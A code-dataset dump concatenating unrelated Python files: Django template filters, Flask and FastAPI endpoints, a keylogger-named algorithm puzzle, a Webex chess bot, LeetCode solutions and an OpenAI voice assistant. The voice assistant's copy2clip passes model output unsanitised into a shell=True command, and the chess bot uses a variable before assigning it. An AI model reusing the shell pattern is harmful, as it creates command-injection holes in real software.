resource_grants(project_or_app):\n try:\n grants = project_or_app.resource_set\n grants = grants.values_list(\n 'resource__name', 'member_capacity', 'project_capacity')\n return dict((e[0], {'member':e[1], 'project':e[2]}) for e in grants)\n except:\n return {}\n\n\ndef get_resource_grant(project_or_app, rname, capacity_for):\n if project_or_app is None:\n return None\n\n resource_set = project_or_app.resource_set\n if not resource_set.filter(resource__name=rname).count():\n return None\n\n resource = resource_set.get(resource__name=rname)\n return getattr(resource, '%s_capacity' % capacity_for)\n\n\n@register.filter\ndef get_member_resource_grant_value(project_or_app, rname):\n return get_resource_grant(project_or_app, rname, \"member\")\n\n\n@register.filter\ndef get_project_resource_grant_value(project_or_app, rname):\n return get_resource_grant(project_or_app, rname, \"project\")\n\n\n@register.filter\ndef resource_diff(r, member_or_project):\n if not hasattr(r, 'display_project_diff'):\n return ''\n\n project, member = r.display_project_diff()\n diff = dict(zip(['project', 'member'],\n r.display_project_diff())).get(member_or_project)\n\n diff_disp = ''\n if diff != '':\n diff_disp = \"(%s)\" % diff\n tpl = '%s'\n cls = 'red' if diff.startswith(\"-\") else 'green'\n return mark_safe(tpl % (cls, diff_disp))\n\n\n@register.filter\ndef sorted_resources(resources_set):\n return views_util.sorted_resources(resources_set)\n\n\n@register.filter\ndef display_resource_usage_for_project(resource, project):\n usage_map = presentation.USAGE_TAG_MAP\n quota = quotas.get_project_quota(project).get(resource.name, None)\n\n if not quota:\n return \"No usage\"\n\n cls = ''\n usage = quota['project_usage']\n limit = quota['project_limit']\n\n if limit == 0 and usage == 0:\n return \"--\"\n\n usage_perc = \"%d\" % ((float(usage) / limit) * 100) if limit else \"100\"\n _keys = usage_map.keys()\n _keys.reverse()\n closest = filter(lambda x: int(x) <= int(usage_perc), _keys)[0]\n cls = usage_map[closest]\n\n usage_display = units.show(usage, resource.unit)\n usage_perc_display = \"%s%%\" % usage_perc\n\n resp = \"\"\"%s (%s)\"\"\" % \\\n (cls, usage_perc_display, usage_display)\n return mark_safe(resp)\n\n\n@register.filter\ndef is_pending_app(app):\n if not app:\n return False\n return app.state in [app.PENDING]\n\n\n@register.filter\ndef is_denied_app(app):\n if not app:\n return False\n return app.state in [app.DENIED]\n\n\ndef _member_policy_formatter(form_or_app, value, changed, mapping):\n if changed:\n changed = defaultfilters.title(mapping.get(changed))\n value = defaultfilters.title(mapping.get(value))\n return value, changed, None, None\n\n\ndef _owner_formatter(form_or_app, value, changed):\n if not changed:\n changed_name = None\n else:\n changed_name = changed.realname\n return value.realname if value else None, changed_name, None, None\n\n\ndef _owner_admin_formatter(form_or_app, value, changed):\n if not changed:\n changed_name = None\n else:\n changed_name = changed.realname + \" (%s)\" % changed.email\n return value.realname + \" (%s)\" % value.email if value else None, changed_name, None, None\n\n\ndef _owner_owner_formatter(form_or_app, value, changed):\n if not changed:\n changed_name = None\n else:\n changed_name = changed.realname\n return \"Me\", changed_name, None, None\n\n\nMODIFICATION_FORMATTERS = {\n 'member_policy': _member_policy_formatter,\n 'owner': _owner_formatter,\n 'owner_admin': _owner_admin_formatter,\n 'owner_owner': _owner_owner_formatter\n}\n\n\n@register.filter\ndef display_modification_param(form_or_app, param, formatter=None):\n formatter_name = None\n if \",\" in param:\n param, formatter_name = param.split(\",\", 1)\n\n project_attr = param\n\n if hasattr(form_or_app, 'instance'):\n # form\n project = Project.objects.get(pk=form_or_app.instance.pk)\n app_value = form_or_app.cleaned_data[param]\n project_value = getattr(project, project_attr)\n else:\n # app\n project = form_or_app.chain\n app_value = getattr(form_or_app, project_attr)\n project_value = getattr(project, project_attr)\n if app_value == None:\n app_value = project_value\n\n formatter_params = {}\n\n if param == \"member_join_policy\":\n formatter_name = 'member_policy'\n formatter_params = {'mapping':\n presentation.PROJECT_MEMBER_JOIN_POLICIES}\n\n if param == \"member_leave_policy\":\n formatter_name = 'member_policy'\n formatter_params = {'mapping':\n presentation.PROJECT_MEMBER_LEAVE_POLICIES}\n\n changed = False\n changed_cls = \"gray details\"\n if project_value != app_value:\n changed = project_value\n\n if not formatter and formatter_name:\n formatter = MODIFICATION_FORMATTERS.get(formatter_name)\n\n changed_prefix = \"current: \"\n if formatter:\n app_value, changed, cls, prefix = formatter(form_or_app,\n app_value, changed,\n **formatter_params)\n if cls:\n changed_cls = cls\n\n if prefix:\n changed_prefix = prefix\n\n tpl = \"\"\"%(value)s\"\"\"\n if changed:\n tpl += \"\"\"\"\"\" + \\\n \"\"\"%(changed_prefix)s%(changed)s\"\"\"\n\n if not app_value:\n app_value = \"(not set)\"\n\n return mark_safe(tpl % {\n 'value': app_value,\n 'changed': changed,\n 'changed_cls': changed_cls,\n 'changed_prefix': changed_prefix\n })\n\n\n@register.filter\ndef display_modification_param_diff(form_or_app, param):\n def formatter(form_or_app, value, changed):\n if changed in [None, False]:\n if _is_inf(value):\n value = \"Unlimited\"\n return value, changed, None, \" \"\n\n to_inf = _is_inf(value)\n from_inf = _is_inf(changed)\n\n diff = value - changed\n sign = \"+\"\n cls = \"green\"\n if diff < 0:\n sign = \"-\"\n diff = abs(diff)\n cls = \"red\"\n\n if diff != 5:\n if from_inf or to_inf:\n if from_inf:\n changed = \"Unlimited\"\n diff = \"from %s\" % changed\n else:\n diff = sign + str(diff)\n changed = \"(%s)\" % (diff,)\n else:\n changed = None\n\n if to_inf:\n value = \"Unlimited\"\n return value, changed, cls, \" \"\n\n return display_modification_param(form_or_app, param, formatter)\n\n\n@register.filter\ndef display_date_modification_param(form_or_app, params):\n param, date_format = params.split(\",\", 1)\n\n def formatter(form_or_app, value, changed):\n if changed not in [None, False]:\n changed = defaultfilters.date(changed, date_format)\n formatted_value = defaultfilters.date(value, date_format)\n return formatted_value, changed, None, None\n\n return display_modification_param(form_or_app, param, formatter)\n\n\n@register.filter\ndef inf_display(value):\n if value == units.PRACTICALLY_INFINITE:\n return 'Unlimited'\n return value\n\n\n@register.filter\ndef inf_value_display(value):\n if value == units.PRACTICALLY_INFINITE:\n return 'Unlimited'\n return value\n\n\n@register.filter\ndef project_name_for_user(project, user):\n return project.display_name_for_user(user)\n\n\n@register.filter\ndef owner_by_uuid(uuid):\n try:\n user = AstakosUser.objects.get(uuid=uuid)\n return \"%s %s (%s)\" % (user.first_name, user.last_name, user.email)\n except AstakosUser.DoesNotExist:\n return uuid\n\n\n@register.filter\ndef format_inf(value):\n if _is_inf(value):\n return \"Unlimited\"\n return value\n","repo_name":"grnet/synnefo","sub_path":"snf-astakos-app/astakos/im/templatetags/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":11861,"program_lang":"python","lang":"en","doc_type":"code","stars":133,"dataset":"github-code","pt":"32"} +{"seq_id":"15243743884","text":"\"\"\"\n@filename : Student.py\n@description : Student 테이블 Controller 구현 \n@author : 천준홍 (cj562270@gmail.com)\n\"\"\"\nfrom flask import request\nfrom flask_restful import Resource\nfrom flask_sqlalchemy import SQLAlchemy\nfrom models.Students import Student as studentModel\nimport json\nfrom utils.Util import replace_quotes\nfrom utils.Util import get_now_string\n\ndb = SQLAlchemy()\n\n# JSON 페이지를 담당하는 클래스\nclass Student(Resource):\n def get(self):\n # 조회 결과를 저장할 빈 변수\n rs = None\n name = request.args.get('name')\n pk = request.args.get('pk')\n\n # 문제 3번(검색어 목록 조회)\n if(pk == None):\n if(name == None):\n name = ''\n search = \"%{}%\".format(name)\n try:\n # like를 이용하여 파라미터가 포함된 이름을 찾고 원하는 컬럼만 select\n rs = studentModel.query.filter(studentModel.name.like(search)).with_entities(studentModel.name, studentModel.grade, studentModel.deptno, studentModel.userid).all()\n except Exception as e:\n return {'rt': replace_quotes(str(e)), 'pubDate': get_now_string()}, 500\n \n # select 결과를 json으로 내보내기 위해 dictionary로 변환\n dic = []\n for i,v in enumerate(rs):\n dic.append({'name': v[0] ,'grade' : v[1] ,'deptno': v[2] ,'userid': v[3]})\n \n return {'rt': 'OK', 'item': dic, 'pubDate': get_now_string()}\n\n # 문제 4번 (pk 파라미터 입력 상세조회)\n else:\n try:\n rs = studentModel.query.filter(studentModel.studno == pk).all()\n # query 오류시 메세지 출력\n except Exception as e:\n return {'rt': replace_quotes(str(e)), 'pubDate': get_now_string()}, 500\n \n # 존재하지 않는 pk값을 입력했을떄 오류메세지 출력\n if (len(rs) == 0):\n return '해당 pk값을 데이터베이스에서 찾을 수 없습니다.'\n dic = rs[0].to_dict()\n\n return {'rt': 'OK', 'item': dic, 'pubDate': get_now_string()}\n\n # 문제 5\n def post(self):\n # 저장할 값을 post 파라미터로 수신\n name = request.form.get('name')\n userid = request.form.get('userid')\n grade = request.form.get('grade')\n idnum = request.form.get('idnum')\n birthdate = request.form.get('birthdate')\n tel = request.form.get('tel')\n height = request.form.get('height')\n weight = request.form.get('weight')\n deptno = request.form.get('deptno')\n profno = request.form.get('profno')\n \n # 수신된 값을 model 객체로 묶는다.\n item = studentModel(name=name, userid=userid,grade=grade, idnum=idnum, birthdate=birthdate, tel=tel, height=height, weight=weight, deptno=deptno, profno=profno)\n \n try:\n # 저장 (insert)\n db.session.add(item)\n # 변경사항 반영\n db.session.commit()\n except Exception as e:\n # 에러가 났다면 변경사항 되돌리기\n db.session.rollback()\n return {'rt': replace_quotes(str(e)), 'pubDate': get_now_string()}, 500\n \n return {'rt': 'OK', 'pubDate': get_now_string()}, 200\n \n # 문제 6\n def put(self):\n studno = request.form.get('studno')\n name = request.form.get('name')\n userid = request.form.get('userid')\n grade = request.form.get('grade')\n idnum = request.form.get('idnum')\n birthdate = request.form.get('birthdate')\n tel = request.form.get('tel')\n height = request.form.get('height')\n weight = request.form.get('weight')\n deptno = request.form.get('deptno')\n profno = request.form.get('profno')\n \n # 입력받은 파라미터만 dictionary로 구성(원하는 파라미터만 변경하기 위함)\n param_list = [name, userid, grade, idnum, birthdate, tel, height, weight, deptno, profno]\n param_str = ['name','userid','grade','idnum','birthdate','tel','height','weight','deptno','profno']\n dic = {}\n for i,v in enumerate(param_list):\n if (v == None):\n continue\n dic[param_str[i]] = v\n\n # 존재하지 않는 studno(pk) 값 입력시 에러메세지 출력\n try:\n rs = studentModel.query.filter(studentModel.studno == studno).all()\n except Exception as e:\n return {'rt': replace_quotes(str(e)), 'pubDate': get_now_string()}, 500\n if (len(rs) == 0):\n return '해당 pk값을 데이터베이스에서 찾을 수 없습니다.'\n\n # 생성한 dictionary를 이용��여 update수행\n try:\n db.session.query(studentModel).filter(studentModel.studno==studno).update(dic)\n db.session.commit()\n # 에러 처리\n except Exception as e:\n db.session.rollback()\n return {'rt': replace_quotes(str(e)), 'pubDate': get_now_string()}, 500\n \n return {'rt': 'OK', 'pubDate': get_now_string()}, 200\n \n # 문제 7\n def delete(self):\n studno = request.form.get('studno')\n \n # 존재하지 않는 studno(pk)를 입력시 에러메세지 출력\n try:\n rs = studentModel.query.filter(studentModel.studno == studno).all()\n except Exception as e:\n return {'rt': replace_quotes(str(e)), 'pubDate': get_now_string()}, 500\n if (len(rs) == 0):\n return '해당 pk값을 데이터베이스에서 찾을 수 없습니다.'\n\n # pk값을 기준으로 delete수행\n try:\n db.session.query(studentModel).filter(studentModel.studno==studno).delete()\n db.session.commit()\n # 에러 처리\n except Exception as e:\n db.session.rollback()\n return {'rt': replace_quotes(str(e)), 'pubDate': get_now_string()}, 500\n \n return {'rt': 'OK', 'pubDate': get_now_string()}, 200","repo_name":"junhong-CHEON/flask_study","sub_path":"210830-flask문제/controllers/Students.py","file_name":"Students.py","file_ext":"py","file_size_in_byte":6148,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29221874273","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\nfor _ in range(int(input())):\r\n W = input().rstrip()\r\n left, right = [], []\r\n \r\n for s in W:\r\n # <1. 커서를 왼쪽으로 옮기는 경우>\r\n if s == '<' and left:\r\n right.append(left.pop())\r\n # <2. 커서를 오른쪽으로 옮기는 경우> \r\n elif s == '>' and right:\r\n left.append(right.pop())\r\n # <3. 제거하는 경우> \r\n elif s == '-' and left:\r\n left.pop()\r\n # <4. 추가하는 경우> \r\n elif s.isalnum():\r\n left.append(s)\r\n \r\n left.extend(reversed(right)) \r\n print(''.join(left))","repo_name":"bbbang105/BaekjoonPrac","sub_path":"백준/Silver/5397. 키로거/키로거.py","file_name":"키로거.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"17839405407","text":"from flask import Flask, request\nimport json\nfrom webexteamssdk import WebexTeamsAPI, Webhook\nimport parser\nfrom helpers import (read_yaml_data,\n get_ngrok_url,\n find_webhook_by_name,\n delete_webhook, create_webhook)\n\nfrom conf import access_token\n\nflask_app = Flask(__name__)\nteams_api = None\n\n@flask_app.route('/teamswebhook', methods=['POST'])\ndef teamswebhook():\n \"\"\"\n Handle \n \"\"\"\n print(\"\\n\" + str(request.method) + \" received\\n\")\n print(request.json)\n\n json_data = request.json\n webhook_obj = Webhook(json_data)\n room = teams_api.rooms.get(webhook_obj.data.roomId)\n message = teams_api.messages.get(webhook_obj.data.id)\n\n # Don't respond to yourself\n if message.personId == teams_api.people.me().id:\n return 'OK'\n else:\n teams_api.messages.create(room.id, text=chess_response)\n person = teams_api.people.get(message.personId)\n \n with open('players.json') as f:\n player_json = f.read()\n\n try:\n board_dest = json.loads(player_json)[0][person]['active']\n except(Exception) as e:\n board_dest = \"board.bd\"\n board_dict = json.loads(player_json)[0]\n board_dict[person]['active'] = board_dest\n with open('players.json', 'w') as f:\n json.dump(board_dict, f)\n \n\n board = parser.Board(dest=board_dest)\n chess_response = parser.parse(board, message)\n\nif __name__ == '__main__':\n\n teams_api = WebexTeamsAPI(access_token=access_token)\n ngrok_url = get_ngrok_url()\n\n webhook_name = 'hello-bot-wb-hook'\n dev_webhook = find_webhook_by_name(teams_api, webhook_name)\n if dev_webhook:\n delete_webhook(teams_api, dev_webhook)\n create_webhook(teams_api, webhook_name, ngrok_url + '/teamswebhook')\n\n flask_app.run(host='0.0.0.0', port=5000)\n","repo_name":"tobyjamez/chesspacito","sub_path":"hello_bot/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20818709619","text":"import threading\n# 定义 个普通的 action 方法,该方法准备作为线程执行体\n\n\ndef action(max1):\n for m in range(max1):\n # 调用 threadi 呵棋块的 cur re 口 t thread ()函��获取当前线程\n # 调用线程对象的 getName ()方法获取当前线程的名字\n print(threading.current_thread().getName() + \"_action_\" + str(m))\n\n\n# 下面是主程序(也就是主线程的线程执行体)\nfor i in range(100):\n # 调用 threading 模块的 current_thread ()函数获取当前线程\n print(threading.current_thread().getName() + \"\" + str(i))\n if i == 20:\n # 创建并启动第一个线程\n t1 = threading.Thread(target=action, args=(100,))\n t1.start()\n # 创建并启动第2个线程\n t2 = threading.Thread(target=action, args=(100,))\n t2.start()\nprint('主线程执行完成!')\n","repo_name":"Carlzkh/CrazyPythonNotes","sub_path":"14/14.2/first_thread.py","file_name":"first_thread.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"14275206693","text":"from dependency_injector.wiring import Provide, inject\nfrom fastapi import APIRouter, Depends\n\nfrom domain.ports.get_order_details_port import OrderDetailsInputPort\nfrom domain.use_cases.get_order_details import GetOrderDetailsByIdUseCase\nfrom frameworks.container import FrameworkContainer\nfrom interface_adapters.dtos.get_order_details_dto import GetOrderDetailsOutputDTO\n\norder_details_route = APIRouter()\n\n\n@order_details_route.get(\n \"/order/details/{order_details_id}\", response_model=GetOrderDetailsOutputDTO\n)\n@inject\nasync def get_order_details(\n order_details_id: int,\n get_order_details_use_case: GetOrderDetailsByIdUseCase = Depends(\n Provide[FrameworkContainer.get_order_details_use_case]\n ),\n) -> GetOrderDetailsOutputDTO:\n \"\"\"Route to create a new table into postgres from a csv file\"\"\"\n try:\n input_port = OrderDetailsInputPort(order_details_id=order_details_id)\n\n output_use_case = await get_order_details_use_case(input_port=input_port)\n\n return GetOrderDetailsOutputDTO(\n order_details_id=output_use_case.order_details_id,\n order_id=output_use_case.order_id,\n pizza_id=output_use_case.pizza_id,\n quantity=output_use_case.quantity,\n )\n except Exception as error:\n return {\"error\": f\"{error}\"}\n","repo_name":"dtleal/gwtk_pizza_place","sub_path":"src/interface_adapters/routes/v1/get_order_details.py","file_name":"get_order_details.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20284690825","text":"from typing import List\n\n\nclass Solution:\n def removeDuplicates(self, nums: List[int]) -> int:\n \"\"\"\n 主要注意删除时下标的变化\n 不能继续用下标迭代,因为长度变化了\n\n 1\n 不需要 每次调用 len 自己记录\n\n 2\n 不需要 pre\n\n 3\n 看了答案记录即可\n \"\"\"\n if not nums:\n return 0\n count = 0\n for i in range(1, len(nums)):\n if nums[count] != nums[i]:\n count += 1\n nums[count] = nums[i]\n return count + 1\n\n\nif __name__ == '__main__':\n Solution().removeDuplicates([1, 1, 2])\n","repo_name":"pingfangx/pythonx","sub_path":"ToolsX/leetcode/0026/0026_3.py","file_name":"0026_3.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"zh","doc_type":"code","stars":22,"dataset":"github-code","pt":"32"} +{"seq_id":"23176798673","text":"import os \nimport openai \nimport pvporcupine \nimport speech_recognition as sr\nimport struct\nimport pyaudio\nimport time\nimport pvcobra\nimport wave\nfrom pydub import AudioSegment\nfrom pydub.playback import play\nfrom gtts import gTTS \nfrom playsound import playsound\n\nimport yaml\n\nimport sys\nimport psutil\nimport logging\ndef read_yaml():\n with open('config.yaml', \"r\") as f:\n return yaml.safe_load(f)\nconf = read_yaml()\nPICOVOICEKEY = conf['Keys']['picovoice']\naikey = conf['Keys']['openai']\n\nimport subprocess\n\n\ndef copy2clip(txt):\n cmd='echo '+txt.strip()+'|clip'\n return subprocess.check_call(cmd, shell=True)\n\n\n\n\n\ncobra = pvcobra.create(access_key=PICOVOICEKEY)\n\nopenai.api_key = aikey\nvoice_file = \"voice.wav\"\nfilename = voice_file\nchunk = 1024\nFORMAT = pyaudio.paInt16\nchannels = 1\nsample_rate = 44100\np = pyaudio.PyAudio()\nstream = p.open(format=FORMAT,\n channels=channels,\n rate=sample_rate,\n input=True,\n output=True,\n frames_per_buffer=chunk)\nframes = []\n\nporcupine = pvporcupine.create(\n access_key=PICOVOICEKEY,keyword_paths=['Hey-Friday_en_windows_v2_2_0.ppn'],\n keywords=['Hey Jarvis']\n)\n\nr = sr.Recognizer()\n\n\n\nwake_word = 'hey assistant'\npa = pyaudio.PyAudio()\naudio_stream = pa.open(\n rate=porcupine.sample_rate,\n channels=1,\n format=pyaudio.paInt16,\n input=True,\n frames_per_buffer=porcupine.frame_length)\n\nprint(\"Listening for wake word ('{}')...\".format(wake_word))\n\nwhile True:\n pcm = audio_stream.read(porcupine.frame_length)\n pcm = struct.unpack_from(\"h\" * porcupine.frame_length, pcm)\n \n keyword_index = porcupine.process(pcm)\n if keyword_index >= 0:\n stream.start_stream()\n \n \n \n \n \n prompt = None\n\n\n start_time = time.time()\n\n while True:\n pcm = audio_stream.read(cobra.frame_length)\n pcm = struct.unpack_from(\"h\"*cobra.frame_length,pcm)\n voice_probability = cobra.process(pcm)\n\n data = stream.read(chunk)\n frames.append(data)\n\n if voice_probability <= 0.2:\n elapsed_time = time.time() - start_time\n if elapsed_time >= 2.0:\n stream.stop_stream()\n \n \n wf = wave.open(filename, \"wb\")\n wf.setnchannels(channels)\n wf.setsampwidth(p.get_sample_size(FORMAT))\n wf.setframerate(sample_rate)\n wf.writeframes(b\"\".join(frames))\n \n transcript = ' '\n\n with sr.AudioFile(filename) as source:\n text = None\n try: \n text = r.recognize_google(r.record(source),None,\"en-US\",0,False)\n except TypeError as e:\n transcript = ' say \"sorry i didnt get that\"'\n transcript = text\n print(transcript)\n \n \n \n \n \n if not isinstance(transcript, str):\n transcript = ' say \"sorry i didnt get that\"'\n wf.close()\n \n os.remove('voice.wav')\n prompt = 'your name will be Friday and your job is an AI Voice Assistant, here is your text, ' + transcript \n\n \n break\n\n else:\n start_time = time.time()\n\n\n\n\n \n \n response = openai.Completion.create(\n model=\"text-davinci-003\",prompt=prompt, temperature = 0,n=1)\n if 'choices' in response and len(response['choices']) > 0:\n message = response['choices'][0]['text']\n copy2clip(message)\n\n #\n tts = gTTS(text=message, lang='en', tld='co.za')\n tts.save('generated_message.mp3')\n\n \n audio_file = AudioSegment.from_file('generated_message.mp3',format='mp3')\n \n play(audio_file)\n \n\n \n else:\n print('Failed to generate message using OpenAI GPT-3.5 API.')\n print(\"Listening for wake word ('{}')...\".format(wake_word))\n","repo_name":"Coolcreeper221/Friday","sub_path":"Jarvis.py","file_name":"Jarvis.py","file_ext":"py","file_size_in_byte":4454,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"38401835526","text":"import logging\nimport copy\nlogger = None\nimport hashlib\n\ndef setup_logger(args):\n global logger\n if logger == None:\n logger = logging.getLogger()\n else: # wish there was a logger.close()\n for handler in logger.handlers[:]: # make a copy of the list\n logger.removeHandler(handler)\n\n args_copy = copy.deepcopy(args)\n # copy to get a clean hash\n # use the same log file hash if iterations or verbose are different\n # these flags do not change the results\n args_copy.iters = 1\n args_copy.verbose = False\n args_copy.log_interval = 1\n args_copy.seed = 0\n\n log_path = './log/{0}_{1}_{2}.log'.format(args.model, args.density, hashlib.md5(str(args_copy).encode('utf-8')).hexdigest()[:8])\n\n logger.setLevel(logging.INFO)\n formatter = logging.Formatter(fmt='%(asctime)s: %(message)s', datefmt='%H:%M:%S')\n\n fh = logging.FileHandler(log_path)\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n\ndef print_and_log(msg):\n global logger\n print(msg)\n logger.info(msg)\n","repo_name":"JiePKU/MIA-SafeCompress","sub_path":"log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"13763232363","text":"from django.urls import path \nfrom . import views\n\napp_name = 'firstapp' #appの名前空間を表す(画面の遷移を指定する場合に用いる)\nurlpatterns={\n path('index/',views.index,name='index'),#/helloでアクセスした場合にviewsファイル内のindex関数を表す\n path('page/',views.user_page,name='user_page'),\n path('number_page//',views.number_page, name = 'number_page'),\n path('home',views.home, name = 'home')\n}","repo_name":"FatherPower/DjangoPractice","sub_path":"firstapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21444449433","text":"from django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n url(r'^demo/ajax', views.ajax),\n url(r'^demo/commands/?$', views.test_commands),\n url(r'^demo/services/?$', views.test_services),\n url(r'^demo/pushkin/?$', views.test_pushkin),\n\n url(r'^grep/voip/tau-8/?$', views.grep_voip_config),\n url(r'^ping/(?P[0-9\\.]+)/$', views.ping),\n\n url(r'^disable/interface/?$', views.disable_interface),\n url(r'^enable/interface/?$', views.enable_interface),\n url(r'^ports/status/?$', views.ports_status),\n\n url(r'^$', views.index),\n]\n\n\n\n","repo_name":"ilique/webpushkin","sub_path":"pushkin/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33966552769","text":"import re\nfrom itertools import chain\n\nfrom typing import List, Union, Iterable, Generator, Optional, Callable\n\n# ---------- Custom typing ----------\nElementsType = List[Union[int, str]]\n\n\ndef serial_no_generator(lower: int = 0, upper: int = 10, reused: bool = True, values: Iterable[int] = None) -> \\\n Generator[int, None, None]:\n values = values or []\n eset = set(filter(lambda x: lower <= x < upper, values))\n if eset:\n max_val = max(eset)\n if reused:\n gen = chain(range(max_val + 1, upper), range(lower, max_val))\n else:\n gen = range(max_val + 1, upper)\n else:\n gen = range(lower, upper)\n for ele in gen:\n if ele in eset:\n continue\n yield ele\n\n\n_fmt_re = re.compile(r'\\{no(:0(\\d+)([bodxX]))?\\}')\n\nb2p_dict = {'b': 2, 'o': 8, 'd': 10, 'x': 16, 'X': 16}\np2b_dict = {2: 'b', 8: 'o', 10: 'd', 16: 'x'}\n\n\nclass LabelFormatOpts:\n def __init__(self, fmt_str, base=10, digits=2):\n\n base_char = p2b_dict[base]\n data = _fmt_re.findall(fmt_str)\n ft = [item[0] for item in data if item[0] != '']\n if ft:\n if all(el == ft[0] for el in ft):\n base_char = ft[0][-1]\n base, digits = b2p_dict.get(base_char), int(ft[0][2:-1])\n else:\n raise ValueError(f'{fmt_str} Define different formatter for no variable.')\n new_field_fmt = '{{no:0{0}{1}}}'.format(digits, base_char)\n\n self.origin_fmt = fmt_str\n self.normalized_fmt = _fmt_re.sub(new_field_fmt, fmt_str)\n\n fr_dict = {\n 'b': '(?P[01]{{{0}}})'.format(digits),\n 'o': '(?P[0-7]{{{0}}})'.format(digits),\n 'd': '(?P[0-9]{{{0}}})'.format(digits),\n 'x': '(?P[0-9a-f]{{{0}}})'.format(digits),\n 'X': '(?P[0-9A-Z]{{{0}}})'.format(digits),\n }\n\n self.parse_re = re.compile(self.normalized_fmt.replace(new_field_fmt, fr_dict[base_char]))\n self.base = base\n self.digits = digits\n self.base_char = base_char\n\n def value2label(self, value: int) -> str:\n return self.normalized_fmt.format(no=value)\n\n def label2value(self, label: str) -> int:\n m = self.parse_re.match(label)\n if m:\n return int(m.group('no'), base=self.base)\n raise ValueError(f'Error Value {label}')\n\n\nclass SerialElement:\n __slots__ = ['value', 'label']\n\n def __init__(self, value, label):\n self.value = value\n self.label = label\n\n\nclass SerialNoPool:\n def __init__(self, lower: int = None, upper: int = None, base: int = 0, digits: int = 0,\n label_fmt: Optional[str] = None):\n\n if label_fmt is None:\n self._opts = None\n else:\n base = base or 10\n digits = digits or 2\n self._opts = LabelFormatOpts(label_fmt, base, digits)\n base = self._opts.base\n digits = self._opts.digits\n\n if lower is not None and lower < 0:\n raise ValueError(f'lower(={lower}) must be >= 0.')\n if upper is not None and upper <= 0:\n raise ValueError(f'upper(={upper}) must be >= 0.')\n s_set = base and digits\n t_set = lower is not None and upper is not None\n\n if t_set:\n self._lower, self._upper = lower, upper\n if s_set:\n cl, cu = 0, base ** digits\n if not (lower >= cl and upper <= cu):\n raise ValueError(f'The lower-upper [{lower},{upper}) is not in [{cl},{cu})')\n else:\n if s_set:\n self._lower, self._upper = 0, base ** digits\n else:\n self._lower, self._upper = 0, 100\n\n self._values = set()\n self._source = None\n\n # ---------- Pool Attributes ----------\n\n @property\n def lower(self):\n return self._lower\n\n @property\n def upper(self):\n return self._upper\n\n # ---------- Data API ----------\n\n def set_elements(self, elements: ElementsType) -> 'SerialNoPool':\n self._values = set()\n self.add_elements(elements)\n return self\n\n def set_source(self, source: Callable[[], ElementsType]) -> 'SerialNoPool':\n self._source = source\n return self\n\n def add_elements(self, elements: ElementsType) -> 'SerialNoPool':\n values = self._elements2values(elements)\n for v in values:\n self._values.add(v)\n return self\n\n def remove_elements(self, elements: ElementsType) -> 'SerialNoPool':\n values = self._elements2values(elements)\n for v in values:\n self._values.remove(v)\n return self\n\n def _elements2values(self, elements: ElementsType) -> List[int]:\n values = [] # type: List[int]\n for ele in elements:\n if isinstance(ele, int):\n value = ele\n elif isinstance(ele, str):\n value = self._opts.label2value(ele)\n else:\n raise TypeError(f'Invalid element {ele}:unsupported type.')\n if self._lower <= value < self._upper:\n values.append(value)\n else:\n raise ValueError(f'Invalid element {ele}: range error')\n return values\n\n # ---------- Generate API ----------\n\n def get_next_generator(self) -> Generator[SerialElement, None, None]:\n \"\"\"\n This is the low-level method.\n :return:\n \"\"\"\n if self._source is not None:\n elements = self._source()\n self.set_elements(elements)\n value_gen = serial_no_generator(lower=self._lower, upper=self._upper, values=self._values)\n for value in value_gen:\n if self._opts:\n label = self._opts.value2label(value)\n else:\n label = None\n yield SerialElement(value, label)\n\n def generate_values(self, num=1) -> List[int]:\n return [se.value for se in self.get_next_generator()][:num]\n\n def generate_labels(self, num=1) -> List[str]:\n if self._opts is None:\n raise TypeError('The operation generate_labels is not allowed when label_fmt is not set.')\n return [se.label for se in self.get_next_generator()][:num]\n\n def generate(self, num=1) -> List[str]:\n return self.generate_labels(num)\n","repo_name":"kinegratii/borax","sub_path":"borax/counters/serial_pool.py","file_name":"serial_pool.py","file_ext":"py","file_size_in_byte":6334,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"32"} +{"seq_id":"35720542878","text":"#!/usr/bin/env python3\n\"\"\"\nnightly.py - tarball creator\n\nThis is a script that creates tarballs\nfor MediaWiki extensions based on the\nconfiguration in conf.py. It accepts\nsome optional arguments:\n\n* --all: Generate tarballs for all extensions.\n* --skins: Process skins instead of extensions\n* --force: Regenerate all tarballs even if they already exist\n\nBy default, it generates only the tarball for the\nVisualEditor extension (or the Vector skin if\n--skins is passed). This will change in the future\nwhen debugging becomes less rare.\n\"\"\"\n\nimport glob\nimport json\nimport logging\nimport os\nimport random\nimport requests\nimport subprocess\nimport sys\nimport traceback\n\n\nclass TarballGenerator(object):\n def __init__(self, conf, repo_type='extensions', force=False):\n self.API_URL = conf['API_URL']\n self.DIST_PATH = conf['DIST_PATH']\n self.GIT_URL = conf['GIT_URL']\n self.LOG_FILE = conf['LOG_FILE']\n self.SRC_PATH = conf['SRC_PATH']\n self.PID_FILE = conf['PID_FILE']\n self.LOG_FILE = 